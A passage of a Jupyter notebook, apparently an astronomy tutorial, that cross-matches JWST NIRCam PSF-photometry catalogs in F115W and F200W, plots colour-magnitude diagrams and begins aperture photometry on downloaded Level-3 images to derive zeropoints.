"max_sep = 0.015 * u.arcsec\n\nmatches_phot_single = []\nfilt1 = 'F115W'\nfilt2 = 'F200W'\n\nfor res1, res2 in zip(results_clean_f115w, results_clean_f200w):\n\n idx, d2d, _ = match_coordinates_sky(res1['radec'], res2['radec'])\n\n sep_constraint = d2d < max_sep\n\n match_phot_single = Table()\n\n x_0_f115w = res1['x_0'][sep_constraint]\n y_0_f115w = res1['y_0'][sep_constraint]\n x_fit_f115w = res1['x_fit'][sep_constraint]\n y_fit_f115w = res1['y_fit'][sep_constraint]\n radec_f115w = res1['radec'][sep_constraint]\n mag_f115w = (-2.5 * np.log10(res1['flux_fit']))[sep_constraint]\n emag_f115w = (1.086 * (res1['flux_unc'] / res1['flux_fit']))[sep_constraint]\n\n x_0_f200w = res2['x_0'][idx[sep_constraint]]\n y_0_f200w = res2['y_0'][idx[sep_constraint]]\n x_fit_f200w = res2['x_fit'][idx[sep_constraint]]\n y_fit_f200w = res2['y_fit'][idx[sep_constraint]]\n radec_f200w = res2['radec'][idx][sep_constraint]\n mag_f200w = (-2.5 * np.log10(res2['flux_fit']))[idx[sep_constraint]]\n emag_f200w = (1.086 * (res2['flux_unc'] / res2['flux_fit']))[idx[sep_constraint]]\n\n match_phot_single['x_0_' + filt1] = x_0_f115w\n match_phot_single['y_0_' + filt1] = y_0_f115w\n match_phot_single['x_fit_' + filt1] = x_fit_f115w\n match_phot_single['y_fit_' + filt1] = y_fit_f115w\n match_phot_single['radec_' + filt1] = radec_f115w\n match_phot_single['mag_' + filt1] = mag_f115w\n match_phot_single['emag_' + filt1] = emag_f115w\n match_phot_single['x_0_' + filt2] = x_0_f200w\n match_phot_single['y_0_' + filt2] = y_0_f200w\n match_phot_single['x_fit_' + filt2] = x_fit_f200w\n match_phot_single['y_fit_' + filt2] = y_fit_f200w\n match_phot_single['radec_' + filt2] = radec_f200w\n match_phot_single['mag_' + filt2] = mag_f200w\n match_phot_single['emag_' + filt2] = emag_f200w\n\n matches_phot_single.append(match_phot_single) ",
"_____no_output_____"
]
],
[
[
"## Color-Magnitude Diagrams (Instrumental Magnitudes) for the 4 images",
"_____no_output_____"
]
],
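[
[
"The instrumental magnitudes plotted here are defined directly from the fitted fluxes,\n\n\\begin{align}\nm_{\\rm inst} = -2.5 \\, \\log_{10}(f_{\\rm fit}), \\qquad \\sigma_m \\simeq \\frac{2.5}{\\ln 10} \\, \\frac{\\sigma_f}{f_{\\rm fit}} \\approx 1.086 \\, \\frac{\\sigma_f}{f_{\\rm fit}}\n\\end{align}\n\nwhich is where the factors $-2.5$ and $1.086$ in the cross-match cells above come from.",
"_____no_output_____"
]
],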
[
[
"plt.figure(figsize=(12, 16))\nplt.clf()\n\nfor i in np.arange(0, len(matches_phot_single), 1):\n ax = plt.subplot(2, 2, i + 1)\n\n j = str(i + 1)\n\n xlim0 = -0.5\n xlim1 = 0.8\n ylim0 = -1\n ylim1 = -9\n\n ax.set_xlim(xlim0, xlim1)\n ax.set_ylim(ylim0, ylim1)\n\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\n f115w_single = matches_phot_single[i]['mag_' + filt1]\n f200w_single = matches_phot_single[i]['mag_' + filt2]\n\n ax.scatter(f115w_single - f200w_single, f115w_single, s=1, color='k')\n\n ax.set_xlabel(filt1 + '-' + filt2, fontdict=font2)\n ax.set_ylabel(filt1, fontdict=font2)\n ax.text(xlim0 + 0.1, -8.65, \"Image %s\" % j, fontdict=font2)\n \nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Difference in retrieved positions (in pixels) between daofind an PSF routine\n\nWe show the difference in the stars position derived from daofind and the psf fitting algorithm. We also show the difference $\\Delta$X and $\\Delta$Y as a function of the instrumental magnitudes. ",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 6))\n\nax1 = plt.subplot(1, 2, 1)\n\nxlim0 = -1\nxlim1 = 1\nylim0 = -1\nylim1 = 1\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nx_find_f115w = results_clean_f115w[0]['x_0']\ny_find_f115w = results_clean_f115w[0]['y_0']\n\nx_psf_f115w = results_clean_f115w[0]['x_fit']\ny_psf_f115w = results_clean_f115w[0]['y_fit']\n\ndelta_x_f115w = x_find_f115w - x_psf_f115w\ndelta_y_f115w = y_find_f115w - y_psf_f115w\n\n_, d_x_f115w, sigma_d_x_f115w = sigma_clipped_stats(delta_x_f115w)\n_, d_y_f115w, sigma_d_y_f115w = sigma_clipped_stats(delta_y_f115w)\n\nax1.scatter(delta_x_f115w, delta_y_f115w, s=1, color='gray')\n\nax1.set_xlabel('$\\Delta$ X (px)', fontdict=font2)\nax1.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\nax1.set_title(filt1, fontdict=font2)\nax1.text(xlim0 + 0.05, ylim1 - 0.15, ' $\\Delta$ X = %5.3f $\\pm$ %5.3f' % (d_x_f115w, sigma_d_x_f115w),\n color='k', fontdict=font2)\nax1.text(xlim0 + 0.05, ylim1 - 0.30, ' $\\Delta$ Y = %5.3f $\\pm$ %5.3f' % (d_y_f115w, sigma_d_y_f115w),\n color='k', fontdict=font2)\nax1.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax1.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2 = plt.subplot(1, 2, 2)\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nx_find_f200w = results_clean_f200w[0]['x_0']\ny_find_f200w = results_clean_f200w[0]['y_0']\n\nx_psf_f200w = results_clean_f200w[0]['x_fit']\ny_psf_f200w = results_clean_f200w[0]['y_fit']\n\ndelta_x_f200w = x_find_f200w - x_psf_f200w\ndelta_y_f200w = y_find_f200w - y_psf_f200w\n\n_, d_x_f200w, sigma_d_x_f200w = sigma_clipped_stats(delta_x_f200w)\n_, d_y_f200w, sigma_d_y_f200w = sigma_clipped_stats(delta_y_f200w)\n\nax2.scatter(delta_x_f200w, delta_y_f200w, s=1, color='gray')\nax2.text(xlim0 + 0.05, ylim1 - 0.15, ' $\\Delta$ X = %5.3f $\\pm$ %5.3f' % (d_x_f200w, sigma_d_x_f200w),\n color='k', fontdict=font2)\nax2.text(xlim0 + 0.05, ylim1 - 0.30, ' $\\Delta$ Y = %5.3f $\\pm$ %5.3f' % (d_y_f200w, sigma_d_y_f200w),\n color='k', fontdict=font2)\nax2.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax2.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2.set_xlabel('$\\Delta$ X (px)', fontdict=font2)\nax2.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\nax2.set_title(filt2, fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 8))\n\nax1 = plt.subplot(2, 2, 1)\n\nxlim0 = -9\nxlim1 = -1\nylim0 = -1\nylim1 = 1\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nmag_inst_f115w = -2.5 * np.log10(results_clean_f115w[0]['flux_fit'])\n\nax1.scatter(mag_inst_f115w, delta_x_f115w, s=1, color='gray')\nax1.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax1.set_xlabel(filt1 + '_inst', fontdict=font2)\nax1.set_ylabel('$\\Delta$ X (px)', fontdict=font2)\n\nax2 = plt.subplot(2, 2, 2)\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(mag_inst_f115w, delta_y_f115w, s=1, color='gray')\nax2.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2.set_xlabel(filt1 + '_inst', fontdict=font2)\nax2.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\n\nax3 = plt.subplot(2, 2, 3)\n\nax3.set_xlim(xlim0, xlim1)\nax3.set_ylim(ylim0, ylim1)\n\nax3.xaxis.set_major_locator(ticker.AutoLocator())\nax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax3.yaxis.set_major_locator(ticker.AutoLocator())\nax3.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nmag_inst_f200w = -2.5 * np.log10(results_clean_f200w[0]['flux_fit'])\n\nax3.scatter(mag_inst_f200w, delta_x_f200w, s=1, color='gray')\nax3.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax3.set_xlabel(filt2 + '_inst', fontdict=font2)\nax3.set_ylabel('$\\Delta$ X (px)', fontdict=font2)\n\nax4 = plt.subplot(2, 2, 4)\n\nax4.set_xlim(xlim0, xlim1)\nax4.set_ylim(ylim0, ylim1)\n\nax4.xaxis.set_major_locator(ticker.AutoLocator())\nax4.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax4.yaxis.set_major_locator(ticker.AutoLocator())\nax4.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax4.scatter(mag_inst_f200w, delta_y_f200w, s=1, color='gray')\nax4.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax4.set_xlabel(filt2 + '_inst', fontdict=font2)\nax4.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Cross-match the 4 catalogs for each filter\n\nTo obtain a final color-magnitude diagram, we need to cross-match all the catalogs for each filters and then cross-match the derived final catalogs.\n\n**Note**: this is the most conservative approach since we impose that a star must be found in all 4 catalogs.\n\n### Note for developer: \n\nI couldn't find an easier way to write this function, where you need to match the first two catalogs, derive a sub-catalogs with only the matches and then iterate for all the other catalogs available. We should also think on how to create a function that allows to keep the stars also if they are available in X out of Y catalogs (i.e., if for some reasons, a measure is not available in 1 of the images, but the star is well measured in the other 3, it doesn't make sense to discard the object).",
"_____no_output_____"
]
],
[
[
"def crossmatch_filter(table=None):\n\n num = 0\n num_cat = np.char.mod('%d', np.arange(1, len(table) + 1, 1))\n\n idx_12, d2d_12, _ = match_coordinates_sky(table[num]['radec'], table[num + 1]['radec'])\n\n sep_constraint_12 = d2d_12 < max_sep\n\n matches_12 = Table()\n\n matches_12['radec_' + num_cat[num]] = table[num]['radec'][sep_constraint_12]\n matches_12['mag_' + num_cat[num]] = (-2.5 * np.log10(table[num]['flux_fit']))[sep_constraint_12]\n matches_12['emag_' + num_cat[num]] = (1.086 * (table[num]['flux_unc'] / \n table[num]['flux_fit']))[sep_constraint_12]\n\n matches_12['radec_' + num_cat[num + 1]] = table[num + 1]['radec'][idx_12[sep_constraint_12]]\n matches_12['mag_' + num_cat[num + 1]] = (-2.5 * np.log10(table[num + 1]['flux_fit']))[idx_12[sep_constraint_12]]\n matches_12['emag_' + num_cat[num + 1]] = (1.086 * (table[num + 1]['flux_unc'] /\n table[num + 1]['flux_fit']))[idx_12[sep_constraint_12]]\n\n idx_123, d2d_123, _ = match_coordinates_sky(matches_12['radec_' + num_cat[num]], table[num + 2]['radec'])\n\n sep_constraint_123 = d2d_123 < max_sep\n\n matches_123 = Table()\n\n matches_123['radec_' + num_cat[num]] = matches_12['radec_' + num_cat[num]][sep_constraint_123]\n matches_123['mag_' + num_cat[num]] = matches_12['mag_' + num_cat[num]][sep_constraint_123]\n matches_123['emag_' + num_cat[num]] = matches_12['emag_' + num_cat[num]][sep_constraint_123]\n matches_123['radec_' + num_cat[num + 1]] = matches_12['radec_' + num_cat[num + 1]][sep_constraint_123]\n matches_123['mag_' + num_cat[num + 1]] = matches_12['mag_' + num_cat[num + 1]][sep_constraint_123]\n matches_123['emag_' + num_cat[num + 1]] = matches_12['emag_' + num_cat[num + 1]][sep_constraint_123]\n matches_123['radec_' + num_cat[num + 2]] = table[num + 2]['radec'][idx_123[sep_constraint_123]]\n matches_123['mag_' + num_cat[num + 2]] = (-2.5 * np.log10(table[num + 2]['flux_fit']))[idx_123[sep_constraint_123]]\n matches_123['emag_' + num_cat[num + 2]] = (1.086 * (table[num + 2]['flux_unc'] /\n table[num + 2]['flux_fit']))[idx_123[sep_constraint_123]]\n\n idx_1234, d2d_1234, _ = match_coordinates_sky(matches_123['radec_' + num_cat[num]], table[num + 3]['radec'])\n\n sep_constraint_1234 = d2d_1234 < max_sep\n\n matches_1234 = Table()\n\n matches_1234['radec_' + num_cat[num]] = matches_123['radec_' + num_cat[num]][sep_constraint_1234]\n matches_1234['mag_' + num_cat[num]] = matches_123['mag_' + num_cat[num]][sep_constraint_1234]\n matches_1234['emag_' + num_cat[num]] = matches_123['emag_' + num_cat[num]][sep_constraint_1234]\n matches_1234['radec_' + num_cat[num + 1]] = matches_123['radec_' + num_cat[num + 1]][sep_constraint_1234]\n matches_1234['mag_' + num_cat[num + 1]] = matches_123['mag_' + num_cat[num + 1]][sep_constraint_1234]\n matches_1234['emag_' + num_cat[num + 1]] = matches_123['emag_' + num_cat[num + 1]][sep_constraint_1234]\n matches_1234['radec_' + num_cat[num + 2]] = matches_123['radec_' + num_cat[num + 2]][sep_constraint_1234]\n matches_1234['mag_' + num_cat[num + 2]] = matches_123['mag_' + num_cat[num + 2]][sep_constraint_1234]\n matches_1234['emag_' + num_cat[num + 2]] = matches_123['emag_' + num_cat[num + 2]][sep_constraint_1234]\n matches_1234['radec_' + num_cat[num + 3]] = table[num + 3]['radec'][idx_1234[sep_constraint_1234]]\n matches_1234['mag_' + num_cat[num + 3]] = (-2.5 * np.log10(table[num + 3]['flux_fit']))[idx_1234[sep_constraint_1234]]\n matches_1234['emag_' + num_cat[num + 3]] = (1.086 * (table[num + 3]['flux_unc'] /\n table[num + 3]['flux_fit']))[idx_1234[sep_constraint_1234]]\n\n 
matches_1234\n\n return matches_1234",
"_____no_output_____"
],
[
"matches_f115w = crossmatch_filter(table=results_clean_f115w)\nmatches_f200w = crossmatch_filter(table=results_clean_f200w)",
"_____no_output_____"
]
],
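[
[
"A possible generalization of `crossmatch_filter` to an arbitrary number of catalogs, sketched here under the same assumptions as above (each table has `radec`, `flux_fit` and `flux_unc` columns, and `max_sep` is defined); it is not used below, but illustrates the iterative match-then-filter pattern. For example, `crossmatch_all(results_clean_f115w, max_sep)` should reproduce `matches_f115w`:\n\n```python\nimport numpy as np\nfrom astropy.table import Table\nfrom astropy.coordinates import match_coordinates_sky\n\ndef crossmatch_all(tables, max_sep):\n    merged = Table()\n    merged['radec_1'] = tables[0]['radec']\n    merged['mag_1'] = -2.5 * np.log10(tables[0]['flux_fit'])\n    merged['emag_1'] = 1.086 * (tables[0]['flux_unc'] / tables[0]['flux_fit'])\n\n    for k, tab in enumerate(tables[1:], start=2):\n        idx, d2d, _ = match_coordinates_sky(merged['radec_1'], tab['radec'])\n        good = d2d < max_sep\n        merged = merged[good]  # keep only sources matched in all catalogs so far\n        merged['radec_%d' % k] = tab['radec'][idx[good]]\n        merged['mag_%d' % k] = (-2.5 * np.log10(tab['flux_fit']))[idx[good]]\n        merged['emag_%d' % k] = (1.086 * (tab['flux_unc'] / tab['flux_fit']))[idx[good]]\n\n    return merged\n```\n\nKeeping sources found in only X out of Y catalogs would instead require an outer join keyed on a master coordinate list rather than this progressive filtering.",
"_____no_output_____"
]
],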
[
[
"For the final catalog, we assume that the magnitude is the mean of the 4 measures and the error on the magnitude is its standard deviation.\n\nTo easily perform this arithmetic operation on the table, we convert the table to pandas dataframe.",
"_____no_output_____"
]
],
[
[
"df_f115w = matches_f115w.to_pandas()\ndf_f200w = matches_f200w.to_pandas()\n\ndf_f115w['RA_' + filt1] = df_f115w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].mean(axis=1)\ndf_f115w['e_RA_' + filt1] = df_f115w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].std(axis=1)\ndf_f115w['Dec_' + filt1] = df_f115w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].mean(axis=1)\ndf_f115w['e_Dec_' + filt1] = df_f115w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].std(axis=1)\ndf_f115w[filt1 + '_inst'] = df_f115w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].mean(axis=1)\ndf_f115w['e' + filt1 + '_inst'] = df_f115w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].std(axis=1)\n\ndf_f200w['RA_' + filt2] = df_f200w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].mean(axis=1)\ndf_f200w['e_RA_' + filt2] = df_f200w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].std(axis=1)\ndf_f200w['Dec_' + filt2] = df_f200w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].mean(axis=1)\ndf_f200w['e_Dec_' + filt2] = df_f200w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].std(axis=1)\ndf_f200w[filt2 + '_inst'] = df_f200w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].mean(axis=1)\ndf_f200w['e' + filt2 + '_inst'] = df_f200w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].std(axis=1)",
"_____no_output_____"
]
],
[
[
"## Final Color-Magnitude Diagram (Instrumental Magnitudes)",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 14))\nplt.clf()\n\nax1 = plt.subplot(1, 2, 1)\n\nax1.set_xlabel(filt1 + '_inst -' + filt2 + '_inst', fontdict=font2)\nax1.set_ylabel(filt1 + '_inst', fontdict=font2)\n\nxlim0 = -0.5\nxlim1 = 0.8\nylim0 = -1.5\nylim1 = -9\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nradec_f115w_inst = SkyCoord(df_f115w['RA_' + filt1], df_f115w['Dec_' + filt1], unit='deg')\nradec_f200w_inst = SkyCoord(df_f200w['RA_' + filt2], df_f200w['Dec_' + filt2], unit='deg')\n\nidx_inst, d2d_inst, _ = match_coordinates_sky(radec_f115w_inst, radec_f200w_inst)\n\nsep_constraint_inst = d2d_inst < max_sep\n\nf115w_inst = np.array(df_f115w[filt1 + '_inst'][sep_constraint_inst])\nef115w_inst = np.array(df_f115w['e' + filt1 + '_inst'][sep_constraint_inst])\nradec_f115w = radec_f115w_inst[sep_constraint_inst]\n\nf200w_inst = np.array(df_f200w[filt2 + '_inst'][idx_inst[sep_constraint_inst]])\nef200w_inst = np.array(df_f200w['e' + filt2 + '_inst'][idx_inst[sep_constraint_inst]])\nradec_f200w = radec_f200w_inst[idx_inst[sep_constraint_inst]]\n\nax1.scatter(f115w_inst - f200w_inst, f115w_inst, s=1, color='k')\n\nax2 = plt.subplot(2, 2, 2)\n\nax2.set_xlabel(filt1 + '_inst', fontdict=font2)\nax2.set_ylabel('$\\sigma$' + filt1, fontdict=font2)\n\nxlim0 = -9\nxlim1 = -1.5\nylim0 = -0.01 \nylim1 = 1\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(df_f115w[filt1 + '_inst'], df_f115w['e' + filt1 + '_inst'], s=1, color='k')\n\nax3 = plt.subplot(2, 2, 4)\n\nax3.set_xlabel(filt2 + '_inst', fontdict=font2)\nax3.set_ylabel('$\\sigma$' + filt2, fontdict=font2)\n\nax3.set_xlim(xlim0, xlim1)\nax3.set_ylim(ylim0, ylim1)\n\nax3.xaxis.set_major_locator(ticker.AutoLocator())\nax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax3.yaxis.set_major_locator(ticker.AutoLocator())\nax3.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax3.scatter(df_f200w[filt2 + '_inst'], df_f200w['e' + filt2 + '_inst'], s=1, color='k')\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Photometric Zeropoints\n\nTo obtain the final calibrated color-magnitude diagram, we need to calculate the photometric zeropoints. Hence we need to perform aperture photometry on the calibrated images (Level-3), apply the appropriate aperture correction for the finite aperture adopted (the values provided in the dictionary above are for an infinite aperture) and then compare it with the PSF photometry. Hence, we can summarize the steps as follows:\n\n* perform aperture photometry \n* apply appropriate aperture correction\n* apply tabulated zeropoint\n* cross-match with psf photometry",
"_____no_output_____"
],
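[
"In short, the zeropoint is the sigma-clipped mean offset between aperture-corrected aperture magnitudes and instrumental PSF magnitudes for the same stars,\n\n\\begin{align}\n{\\rm ZP} = \\langle m_{\\rm aper,corr} - m_{\\rm PSF,inst} \\rangle, \\qquad m_{\\rm cal} = m_{\\rm PSF,inst} + {\\rm ZP}\n\\end{align}",
"_____no_output_____"
],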
[
"## Load the calibrated and rectified images (Level 3 imaging pipeline)",
"_____no_output_____"
]
],
[
[
"dict_images_combined = {'NRCA1': {}, 'NRCA2': {}, 'NRCA3': {}, 'NRCA4': {}, 'NRCA5': {},\n 'NRCB1': {}, 'NRCB2': {}, 'NRCB3': {}, 'NRCB4': {}, 'NRCB5': {}}\n\ndict_filter_short = {}\ndict_filter_long = {}\n\nff_short = []\ndet_short = []\ndet_long = []\nff_long = []\ndetlist_short = []\ndetlist_long = []\nfiltlist_short = []\nfiltlist_long = []\n\nif not glob.glob('./*combined*fits'):\n\n print(\"Downloading images\")\n\n boxlink_images_lev3 = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/images_level3.tar.gz'\n boxfile_images_lev3 = './images_level3.tar.gz'\n urllib.request.urlretrieve(boxlink_images_lev3, boxfile_images_lev3)\n\n tar = tarfile.open(boxfile_images_lev3, 'r')\n tar.extractall()\n\n images_dir = './'\n files_singles = sorted(glob.glob(os.path.join(images_dir, \"*combined*fits\")))\n\nelse:\n\n images_dir = './'\n files_singles = sorted(glob.glob(os.path.join(images_dir, \"*combined*fits\")))\n\nfor file in files_singles:\n\n im = fits.open(file)\n f = im[0].header['FILTER']\n d = im[0].header['DETECTOR']\n\n if d == 'NRCBLONG':\n d = 'NRCB5'\n elif d == 'NRCALONG':\n d = 'NRCA5'\n else:\n d = d\n\n wv = np.float(f[1:3])\n\n if wv > 24:\n ff_long.append(f)\n det_long.append(d)\n\n else:\n ff_short.append(f)\n det_short.append(d)\n\n detlist_short = sorted(list(dict.fromkeys(det_short)))\n detlist_long = sorted(list(dict.fromkeys(det_long)))\n\n unique_list_filters_short = []\n unique_list_filters_long = []\n\n for x in ff_short:\n\n if x not in unique_list_filters_short:\n\n dict_filter_short.setdefault(x, {})\n\n for x in ff_long:\n if x not in unique_list_filters_long:\n dict_filter_long.setdefault(x, {})\n\n for d_s in detlist_short:\n dict_images_combined[d_s] = dict_filter_short\n\n for d_l in detlist_long:\n dict_images_combined[d_l] = dict_filter_long\n\n filtlist_short = sorted(list(dict.fromkeys(dict_filter_short)))\n filtlist_long = sorted(list(dict.fromkeys(dict_filter_long)))\n\n if len(dict_images_combined[d][f]) == 0:\n dict_images_combined[d][f] = {'images': [file]}\n else:\n dict_images_combined[d][f]['images'].append(file)\n\nprint(\"Available Detectors for SW channel:\", detlist_short)\nprint(\"Available Detectors for LW channel:\", detlist_long)\nprint(\"Available SW Filters:\", filtlist_short)\nprint(\"Available LW Filters:\", filtlist_long)",
"_____no_output_____"
]
],
[
[
"## Display the images",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n image = fits.open(dict_images_combined[det][filt]['images'][0])\n data_sb = image[1].data\n\n ax = plt.subplot(1, len(filts_short), i + 1)\n\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n plt.title(filt, fontdict=font2)\n\n ax.imshow(data_sb, norm=norm, cmap='Greys')\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Aperture Photometry",
"_____no_output_____"
],
[
"As we have done previously, we create a dictionary that contains the tables with the derived aperture photometry for each image.",
"_____no_output_____"
]
],
[
[
"dict_aper = {}\n\nfor det in dets_short:\n\n dict_aper.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n\n dict_aper[det].setdefault(filt, {})\n\n dict_aper[det][filt]['stars for ap phot'] = None\n dict_aper[det][filt]['stars for ap phot matched'] = None\n dict_aper[det][filt]['aperture phot table'] = None",
"_____no_output_____"
]
],
[
[
"### Find bright isolated stars",
"_____no_output_____"
]
],
[
[
"def find_bright_stars(det='NRCA1', filt='F070W', dist_sel=False):\n\n bkgrms = MADStdBackgroundRMS()\n mmm_bkg = MMMBackground()\n\n image = fits.open(dict_images_combined[det][filt]['images'][i])\n data_sb = image[1].data\n imh = image[1].header\n\n print(\"Selecting stars for aperture photometry on image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n\n data = data_sb / imh['PHOTMJSR']\n print(\"Conversion factor from {units} to DN/s for filter {f}:\".format(units=imh['BUNIT'], f=filt), imh['PHOTMJSR'])\n\n sigma_psf = dict_utils[filt]['psf fwhm']\n\n print(\"FWHM for the filter {f}:\".format(f=filt), sigma_psf, \"px\")\n\n std = bkgrms(data)\n bkg = mmm_bkg(data)\n daofind = DAOStarFinder(threshold=th[j] * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n apcorr_stars = daofind(data)\n dict_aper[det][filt]['stars for ap phot'] = apcorr_stars\n \n if dist_sel:\n\n print(\"\")\n print(\"Calculating closest neigbhour distance\")\n\n d = []\n\n daofind_tot = DAOStarFinder(threshold=10 * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n stars_tot = daofind_tot(data)\n\n x_tot = stars_tot['xcentroid']\n y_tot = stars_tot['ycentroid']\n\n for xx, yy in zip(apcorr_stars['xcentroid'], apcorr_stars['ycentroid']):\n\n sep = []\n dist = np.sqrt((x_tot - xx)**2 + (y_tot - yy)**2)\n sep = np.sort(dist)[1:2][0]\n d.append(sep)\n\n apcorr_stars['min distance'] = d\n mask_dist = (apcorr_stars['min distance'] > min_sep[j])\n\n apcorr_stars = apcorr_stars[mask_dist]\n\n dict_aper[det][filt]['stars for ap phot'] = apcorr_stars\n\n print(\"Minimum distance required:\", min_sep[j], \"px\")\n print(\"\")\n print(\"Number of bright isolated sources found in the image for {f}:\".format(f=filt), len(apcorr_stars))\n print(\"-----------------------------------------------------\")\n print(\"\")\n else:\n print(\"\")\n print(\"Number of bright sources found in the image for {f}:\".format(f=filt), len(apcorr_stars))\n print(\"--------------------------------------------\")\n print(\"\") \n \n return",
"_____no_output_____"
],
[
"tic = time.perf_counter()\n\nth = [700, 500] # threshold level for the two filters (length must match number of filters analyzed)\nmin_sep = [10, 10] # minimum separation acceptable for zp stars from closest neighbour\n\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images_combined[det][filt]['images']), 1):\n\n find_bright_stars(det=det, filt=filt, dist_sel=False)\n\ntoc = time.perf_counter()\n\nprint(\"Elapsed Time for finding stars for Aperture Photometry:\", toc - tic) ",
"_____no_output_____"
]
],
[
[
"As a further way to obtain a good quality sample, we cross-match the catalogs from the two filters and retain only the stars in common",
"_____no_output_____"
]
],
[
[
"for det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images_combined[det][filt]['images']), 1):\n\n image = ImageModel(dict_images_combined[det][filt]['images'][i])\n\n ra, dec = image.meta.wcs(dict_aper[det][filt]['stars for ap phot']['xcentroid'],\n dict_aper[det][filt]['stars for ap phot']['ycentroid'])\n \n radec = SkyCoord(ra, dec, unit='deg')\n dict_aper[det][filt]['stars for ap phot']['radec'] = radec",
"_____no_output_____"
],
[
